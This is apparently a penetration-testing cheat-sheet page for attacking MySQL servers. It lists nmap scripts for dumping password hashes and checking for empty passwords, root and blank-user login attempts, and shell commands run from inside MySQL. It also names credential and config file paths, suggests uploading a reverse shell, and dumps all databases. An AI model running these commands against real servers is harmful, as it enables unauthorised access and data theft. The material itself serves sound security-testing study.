Comment on page
MySQL
nmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $ip -p 3306
nmap -sV -Pn -vv -script=mysql* $ip -p 3306
If Mysql is running as root and you have access, you can run commands:
mysql> select do_system('id');
mysql> \! sh
mysql --host=$ip -u root -p
mysql -h $ip -u wpmaster@localhost -p
mysql -h $ip -u root@localhost
mysql -h $ip -u ""@localhost
telnet $ip 3306
nmap –script=mysql-enum –script-args userdb=<username lists> $ip
mysql -h $ip -P 3306
mysql -u <user> -p <password>
mysql -u root -p
- Unixmy.cnf/etc/mysql/etc/my.cnf/etc/mysql/my.cnf/var/lib/mysql/my.cnf~/.my.cnf/etc/my.cnf
- Windowsconfig.inimy.iniwindows\my.iniwinnt\my.ini<InstDir>/mysql/data/
~/.mysql.history
connections.log
update.log
common.log
- You might gain access to a shell by uploading a reverse-shell. And then you need to escalate your privilege.
- Look into the database and see what users and passwords that are available./var/www/html/configuration.php
mysqldump -u admin -p admin --all-databases --skip-lock-tables
Last modified 1yr ago